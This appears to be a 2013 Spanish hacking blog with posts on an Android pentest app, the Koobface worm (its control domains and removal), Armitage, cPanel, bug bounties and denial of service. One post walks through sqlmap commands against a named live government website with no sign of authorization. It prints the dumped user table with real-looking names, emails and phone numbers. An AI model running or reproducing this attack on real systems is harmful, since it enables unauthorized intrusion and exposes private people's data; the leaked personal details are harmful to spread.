martes, 21 de mayo de 2013


NETWORK TOOLKIT ANDROID, HACER UN PENTESITNG…. CADA VEZ MAS A LA MANO.

Bueno en esta oportunidad comparto una herramienta que encontre sobre pentesting en dispositivos móviles android.

esta aplicación es desarrollada por ZImperium LTD  una compañía dedicada a la seguridad en dispositivos móviles con la finalidad de brindar comodidad a la hora de realizar analisis de vulnerabilidades desde dispositivos móviles, recordemos que los dispositivos móviles tienen ahora una gran demanda dentro de la seguridad informática , por esto nace ANTI la cual se puede descargar su versión free desde Aquí.
ANTI nos permite realizar: scannig de puertos, detección de OS, Traceroute, Port connect, Wifi Monitor, HTTP server, Man in The middle, Remote Exploits, y entre otras.

domingo, 19 de mayo de 2013

VIRUS DE FACEBOOK

KoobFace: El virus de Facebook

Koobface, un anagrama de Facebook ("face" y "book" con el orden cambiado y "koob" es "book" al revés, "libro" en inglés), es un Gusano informático que ataca a usuarios de las redes sociales Facebook, MySpace,hi5, Bebo, Friendster y Twitter. Koobface intenta en última instancia, luego de una infección exitosa, obtener información sensible de las víctimas, como números de tarjetas de crédito.
Koobface se disemina enviando un mensaje mediante Facebook a las personas que son 'amigos' de la persona cuyo ordenador ha sido infectado. El mensaje contiene un asunto inocuo como (en ingles) "Paris Hilton Tosses Dwarf On The Street", "LOL", "My Friend catched [sic] you on hidden cam" y "My home video :)" seguido de un link. Después de recibido, el mensaje redirecciona al receptor a un sitio externo no afiliado con Facebook, donde se muestra una supuesta actualización del reproductor Flash de Adobe. Si el archivo es descargado y ejecutado, el ordenador será infectado con Koobface. El virus luego comanda las actividades de navegacion, dirigiendo a los usuarios a sitios web contaminados cuando intentan acceder a motores de busqueda como Google, Yahoo, Bing, y Ask.com. Algunos motores de búsqueda, incluyendo AOL Search, no son afectados por Koobface.

Algunas variantes del virus han sido identificadas:

La funcionalidad de puerta trasera permite a un usuario remoto realizar las siguientes operaciones en el sistema comprometido:
  • Descarga y ejecutar un fichero.
  • Abrir una imagen.
  • Actualizar el código malicioso.
  • Bloquear una dirección IP.
  • Poner un mensaje en Twitter, que es lo que hace de este virus la unica forma de auto-expandirse en internet, ya que, de por si mismo, no es capaz de autoreplicarse.
Abre una puerta trasera en el sistema comprometido y se conecta con uno de los siguientes sitios web:
  • www.trisem.com/achche
  • www.rd040609-cgpay.com/achche
  • www.upr0306.com/achche
  • www.rjulythree.com/achche
  • www.uthreejuly.com/achche
  • www.mymegadomain03072009.com/achche

Como saber si se está infectado con el Koobface.C. ¿Como saber si tienes el Koobface.C?

En caso de que aparezcan en tu ordenador los siguientes ficheros:
  • %Windir%\twitty[DOS NÚMEROS].exe
  • %Windir\%tw[CINCO NÚMEROS].dat
Y en el registro de Windows las siguientes claves
  • Clave:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • Valor: “systwtray” = “%Windir%\twitty[TWO DIGIT NUMBER].exe”

Como eliminar y quitar el Koobface.C

Para eliminar el Koobface.C intente restaurar el sistema a una fecha anterior a la infección, a un punto de restauración anterior, en caso de que sepa cuando fué infectado. Recuerde que esto también afectará a los programas y ficheros que usted haya podido modificar, crear o instalar a posteriori de la fecha de restauración.
En caso de que no funcione o no pueda restaurar el sistema, para quitar el FakePowav.B pruebe lo siguiente:
  1. Desactivar temporalmente la Restauración del Sistema.
  2. Reiniciar el ordenador a Modo a Prueba de Fallos.
  3. Con un antivirus actualizado, borre y ataque todos los archivos infectados.
  4. Elimine los archivos explicados en ¿Como saber si está infectado?
  5. En caso de no poder eliminar el virus por estar en ejecución, abra el Administrador de Tareas y detenga el nombre del Proceso que esté trabajando en ese momento activo por el virus y vuelva al paso numero 4.
  6. Edite el registro y elimine los parámetros explicados en ¿Como saber si está infectado?
  7. Eliminar archivos temporales
  8. Reiniciar el ordenador





domingo, 12 de mayo de 2013

EXPLOTANDO VULNERABILIDADES



Explotando Vulnerabilidades de Inyección SQL desde SQLMAP






Hola, en la entrada anterior explique como explotar Inyección SQL manualmente, entonces hoy escribiré como explotar las vulnerabilidades de Inyección SQL desde la herramienta SQLMAP, solo explicare las funciones básicas de esta herramienta para obtener algunas base de datos de los sitios webs vulnerables.

¿Que es SQLMAP?

Sqlmap es una herramienta desarrollada en python para realizar inyección de código sql automáticamente. Su objetivo es detectar y aprovechar las vulnerabilidades de inyección SQL en aplicaciones web. Una vez que se detecta una o más inyecciones SQL en el host de destino, el usuario puede elegir entre una variedad de opciones entre ellas, enumerar los usuarios, los hashes de contraseñas, los privilegios, las bases de datos , O todo el volcado de tablas / columnas específicas del DBMS , ejecutar  su propio SQL SELECT, leer archivos específicos en el sistema de archivos y mucho más.

Características

  • Soporte completo para MySQL, Oracle, PostgreSQL y Microsoft SQL. Además de estos cuatro sistemas de gestión de bases de datos, sqlMap también puede identificar Microsoft Access, DB2, Informix, Sybase y Interbase.
  • Amplia base de datos de sistema de gestión de huellas dactilares basadas en inband error messages, analizar el banner, las funciones de salida de comparación y características específicas tales como MySQL comment injection. También es posible forzar a la base de datos de sistema de gestión de nombre si ya lo saben.
  • Soporte completo para 2 técnicas de SQL injection: blind SQL injection y inband SQL injection.

Comandos Básicos:
-u 
-D
-T
-C
--tables
--columns
--dump

Ubicación en BackTrack 5r2:
Aplicaciones - BackTrack - Exploitation Tools - Web Exploitation Tools - SqlMap

Teniendo la herramienta lista para su uso, buscaremos una web vulnerable, en este caso yo usare la siguiente:

http://www.fonep.gob.ve/noticias.php?id=195'
SQL/DB Error -- [

    Could not execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''195'' AND c.publicado_contenido != 0' at line 13

Como vemos la web es vulnerable a Inyeccion SQL, entonces nos dirigimos a la herramienta para explotar dicha vulnerabilidad.

El primer comando que tenemos que colocar para obtener la base de datos sera esta:

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 --dbs

La herramienta auditara el sitio y comprobara si es vulnerable, entonces si la herramienta comprueba que el sitio es vulnerable, automáticamente nos arrojara la base de datos, en este caso me la arrojo:

available databases [2]:
[*] information_schema
[*] penof_cms

Bien, teniendo ya la base de datos, la que nos interesaría en este caso seria penof_cms, entonces para obtener las tablas de dicha db, colocaremos el siguiente comando:

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D penof_cms --tables

Entonces de inmediato la herramienta nos arrojara las tablas de la db que hemos solicitado:

Database: penof_cms
[20 tables]
+-------------------+
| fonep_cargos      |
| fonep_ciudades    |
| fonep_contacto    |
| fonep_contenido   |
| fonep_contratista |
| fonep_documentos  |
| fonep_ds          |
| fonep_empleo      |
| fonep_enlaces     |
| fonep_errores     |
| fonep_estados     |
| fonep_extras      |
| fonep_log         |
| fonep_media       |
| fonep_rextras     |
| fonep_rsecciones  |
| fonep_rtagcloud   |
| fonep_secciones   |
| fonep_tagcloud    |
| fonep_usuarios    |
+-------------------+

Bien, ahora como a nosotros en toda inyección sql, nos interesa la tabla usuarios, colocaremos el siguiente comando para ver sus columnas:

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D penof_cms -T fonep_usuarios --columns

La cual la herramienta nos arroja todas las columnas de la tabla usuarios:

Database: penof_cms
Table: fonep_usuarios
[9 columns]
+-----------------------+-----------------+
| Column                | Type            |
+-----------------------+-----------------+
| apellido_usuarios     | varchar(45)     |
| clave_usuarios        | varchar(40)     |
| email_usuarios        | varchar(255)    |
| id_usuarios           | int(2) unsigned |
| institucion_usuarios  | varchar(45)     |
| nombre_usuarios       | varchar(45)     |
| permisos_usuarios     | tinyint(4)      |
| telf_usuarios         | int(11)         |
| ultimoacceso_usuarios | datetime        |
+-----------------------+-----------------+

Si queres todo el contenido de dicha columna, en este caso fonep_usuarios, solo colocaremos este comando:

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D penof_cms -T fonep_usuarios --dump

Entonces la herramienta dumpeara todo el contenido.

En este caso yo solo necesito las columnas apellido_usuarios, email_usuarios, nombre_usuarios, telf_usuarios, la cual colocaremos el siguiente comando:

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D penof_cms -T fonep_usuarios -C "apellido_usuarios,email_usuarios,nombre_usuarios,telf_usuarios" --dump

Database: penof_cms
Table: fonep_usuarios
[3 entries]
+-------------------+----------------------------+-----------------+---------------+
| apellido_usuarios | email_usuarios             | nombre_usuarios | telf_usuarios |
+-------------------+----------------------------+-----------------+---------------+
| Olivo             | ernesto.olivo@ingenian.net | Ernesto         | 8886591       |
| Gimenez           | lugimenez@cantv.net        | Luis            | 2122112323    |
| Gonzalez Aviles   | serser2020@gmail.com       | Sergio          | 2147483647    |
+-------------------+----------------------------+-----------------+---------------+

Entonces, con ese comando obtendremos los datos específicos de dicha base de datos.

¿No entendiste?

No te preocupes, te dejare un video de esta inyeccion:


[Armitage] Administrador Gráfico de Cyber Ataques para Metasploit

Armitage es un Administrador Gráfico de Cyber Ataques para Metasploit que sirve para visualizar gráficamente tus objetivos, el mismo programa te recomienda que exploit usar, expone las opciones avanzadas del framework (esas que comúnmente se nos olvida o no sabemos), desde el mismo Armintage podemos iniciar un análisis con Nmap, e incluso se puede usar el módulo de Brute Force para sacar username/password.

El objetivo de Armitage es hacer Metasploit útil para los profesionales de seguridad que saben hacking, pero no el uso de Metasploit a fondo. Si desean aprender las características avanzadas de Metasploit, Armitage será de gran ayuda.
Es una herramienta impresionante y muy intuitiva, considero que la herramienta viene como anillo al dedo para los usuarios de Windows que están más acostumbrados a usar el mouse que el teclado (no como los usuarios de GNU/Linux que es al revés). Lo mejor de todo es que se encuentra para los 2 sistemas operativos.
Aquí les dejo 2 Videos oficiales de esta excelente herramienta, disfrútenlos:
Video Explicativo de Armitage (Está en inglés pero bastante entendible):

En acción: 


Para terminar un enlace a la web oficial donde pueden descargar el Armitage tanto para GNU/Linux como para Windows: http://www.fastandeasyhacking.com/download


BUSCANDO UN CPANEL

Panel (acrónimo de control Panel) es una herramienta de administración basado en tecnologías web para administrar sitios de manera fácil, con una interfaz limpia. Se trata de un software no libre disponible para un gran número de distribuciones de Linux que soporten RPM, como SuSE, Fedora, Mandriva, etc. El soporte preliminar es para Debian, se debió solicitar que saliera del estado beta por varios años, y para el cual no posee soporte. A cPanel se accede por los puertos 2082 y 2083 (para versiones de SSL). La autenticación es por HTTP o una página de ingreso.
Se diseñó para el uso comercial de servicios de alojamiento web, es por esto que la compañía no lo ofrece con licencia de uso personal. Sin embargo, los dueños de organizaciones sin fines de lucro, como instituciones educacionales y caridad pueden solicitar una licencia sin costo.
Está disponible sólo para sistemas operativos basados en Linux, pero las versiones para Solaris, Microsoft Windows y Mac OS Xestán desarrollándose.

En este video demostraremos lo sencillo que es conseguir el panel de control 
espero que les sirva de algo no se olviden de comentar.

jueves, 9 de mayo de 2013


Lista de Programas Bug Bounty (Ganando Dinero por reportar Vulnerabilidades)




Bug Bounty Program es un tema muy conocido que manejan las compañías conocidas como: Google, Facebook, Mozilla, etc, la cual se basa en realizar un pago considerable a los "Hackers" o "Security Research" por encontrar y reportar cualquier tipo de vulnerabilidad en sus servidores web, productos, servicios o algunas aplicaciones asociadas. 


Mayormente este programa los emplean las grandes empresas y sitios webs como también las empresas que desean mejorar su seguridad con el fin de brindar un mejor servicio a sus clientes, para tal caso listare la información respectiva que brindan las empresas con mas influencia en la red para reportar las vulnerabilidades que podamos encontrar al momento que estemos realizando nuestras auditorias.


BUG BOUNTY VULNERABILIDADES EN APLICACIONES WEB:


Mozilla

Google

Facebook

Paypal

Etsy

Wordpress

Commonsware

CCBill

Vark

Windthorstisd

BUG BOUNTY VULNERABILIDADES EN PRODUCTOS:




HALL OF FAME (SALON DE LA FAMA):


Microsoft

Apple

Adobe

IBM

Twitter

Dropbox

Cisco

Moodle
  • http://moodle.org/security

Drupal

Oracle

Symantec

Ebay

Twilio

37 Signals

Salesforce

Reddit

Github

Ifixit

Constant Contact

Zeggio

Simplify

Team Unify

Skoodat

Relaso

Moduscsr

Cloudnetz

Emptrust

Apriva

Amazon

SqaureUp

G-Sec

Xen

Engine Yard

Lastpass

RedHat

Acquia

Mahara


Zynga

Risk.io

Opera 

Owncloud

Scorpion Soft


Norada 

Cpaperless 

Wizehive 

Tuenti

Nokia Siemens

Sound Cloud

Puppetlabs

Neohapsis

HTC

Estas son las empresas que nos pueden considerar un pago por reportarles los fallos de seguridad que se encuentran en sus sitios webs y productos.

Les mostrare una vulnerabilidad (XSS) que encontre en Google Play la cual fue respectivamente reportada y aceptada.






viernes, 3 de mayo de 2013

ATAQUE DE DENEGACIÓN DE SERVICIO


HISTORIA 
Ataque de denegación de servicios, también llamado ataque DoS (de las siglas en inglés Denial of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos. Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos computacionales del sistema de la víctima. Un ejemplo notable de este tipo de ataque se produjo el 27 de marzo de 2013, cuando un ataque de una empresa a otra inundó la red de spam provocando una ralentización generalizada de Internet e incluso llegó a afectar a puntos clave como el nodo central de Londres. 

¿QUÉ ES UN ATAQUE DoS?

DoS  significa que se ataca al servidor desde muchos ordenadores para que deje de funcionar.
Pero aun así esto no nos guía mucho sobre lo que es un DoS. Para explicarlo voy a recurrir a una simple analogía en la que nuestro servidor es un auxiliar que atiende a personas en una ventanilla.
Nuestro auxiliar es muy eficiente y es capaz de atender a varias personas a la vez sin despeinarse: es su carga normal. Pero un día empiezan a llegar cientos de personas a la ventanilla a pedirle cosas a nuestro auxiliar. Y como cualquier humano normal, cuando hay mucha gente dándole la lata no puede atender a todos y empieza a atender más lento de lo normal. Si viene todavía más gente probablemente acabe hasta las narices, se marchará de la ventanilla y ya no atenderá a nadie más.
En el servidor pasa lo mismo: cuando hay demasiadas peticiones se queda sin recursos, se cuelga y deja de funcionar. Puede que se apague directamente o que sólo deje de responder conexiones. De cualquiera de las dos formas, el servidor no volverá a la normalidad hasta que el ataque pare, ya sea porque los atacantes han parado o porque se logrado bloquear las conexiones ilegítimas (veremos más adelante cómo), y se rearranque todo lo que haya dejado de funcionar.
Este es el concepto básico del DDoS, aunque se puede modificar para que sea más efectivo. Por ejemplo, se pueden enviar los datos muy lentamente haciendo que el servidor consuma más recursos por cada conexión (Slow Read es un ejemplo de ataque de este tipo), o alterar los paquetes para que el servidor se quede esperando indefinidamente una respuesta de una IP falsa (el nombre técnico es SYN flood)

¿CÓMO SE LLEVA A CABO UN ATAQUE DoS?

Como el concepto básico del DDoS es simple, realizar los ataques es relativamente fácil. De hecho, valdría con que hubiese un número suficientemente grande de personas recargando la web continuamente para tirarla. Sin embargo, las herramientas que se suelen usar son algo más complejas.
Con ellas se pueden crear muchas conexiones simultáneas o enviar paquetes alterados con las técnicas que comentaba antes. También permiten modificar los paquetes poniendo como IP de origen una IP falsa, de forma que no pueden detectar quién es el atacante real.
Otra técnica para llevar a cabo los DDoS es usar botnets: redes de ordenadores infectados por un troyano y que un atacante puede controlar remotamente. De esta forma, los que saturan el servidor son ordenadores de gente que no sabe que están participando en un ataque DDoS, por lo que es más difícil encontrar al verdadero atacante.


¿CÓMO AFECTA UN DoS A UNA WEB?


Depende del ataque y del servidor. Los servidores se pueden proteger contra estos ataques con filtros que rechacen los paquetes mal formados o modificados con IPs falsas, de forma que al servidor sólo le llegan los paquetes legítimos. Por supuesto, las medidas no son infalibles y el servidor siempre puede acabar saturado si el ataque es suficientemente masivo y está bien preparado.
Para que os hagáis una idea del volumen necesario para que un DDoS sea efectivo, abajo tenéis un gráfico que representa el tráfico de un servidor a lo largo del tiempo. El tráfico durante el ataque (en verde) es tan grande que apenas se aprecia el tráfico normal del servidor.



¿Y qué ocurre cuando el servidor se satura? Simplemente deja de estar disponible durante un tiempo hasta que el ataque para. Es muy difícil que se produzcan daños físicos en el servidor. Además, el DoS por sí sólo no permite entrar en el servidor: para ello es necesario aprovechar alguna vulnerabilidad, y eso no es nada fácil.
Así que, básicamente, un DDoS sólo puede provocar la caída de la web, nada más. Dependiendo del tipo de web esto puede ser una catástrofe o no. Si la web genera dinero (venta online, publicidad), el propietario deja de ganar dinero mientras esa web está caída. Imaginaos las pérdidas que puede llegar a tener Amazon, por ejemplo, si su página está caída durante un día.
Pero, ¿qué pasa cuando la página es simplemente informativa, como pueden ser las de instituciones públicas? La verdad es que no pasa mucho. La institución no depende de la web para funcionar. En su lugar se suelen usar redes internas que no están accesibles desde Internet, sólo desde dentro de la propia institución, por lo que no se ven afectadas por el ataque. Lo único que ocurre es que el que quiera ver alguna información de esa página tendrá que esperarse un rato a que esté disponible.
Esto me lleva inevitablemente a hacerme la siguiente pregunta: ¿sirven los DDoS como medio de protesta? La respuesta depende de la persona, pero yo tengo mi postura bastante clara: no sirven.
Ya hemos visto que en webs que no son comerciales un DDoS tiene un impacto muy limitado. A la institución no le fastidian demasiado y como no se requieren demasiadas personas para llevar a cabo el ataque podrán decir que es un “grupo minoritario” el que protesta.
Pero no sólo es que no produzcan muchos efectos positivos: producen efectos negativos. La gente más ajena a internet suele asociar “ataque informático” con “hackers” y estos con “gente peligrosa”. Con dar un poco de cancha a esta asociación es muy fácil descalificar sin argumentos las protestas, porque, ¿quién va a apoyar, debatir o escuchar a “gente peligrosa”?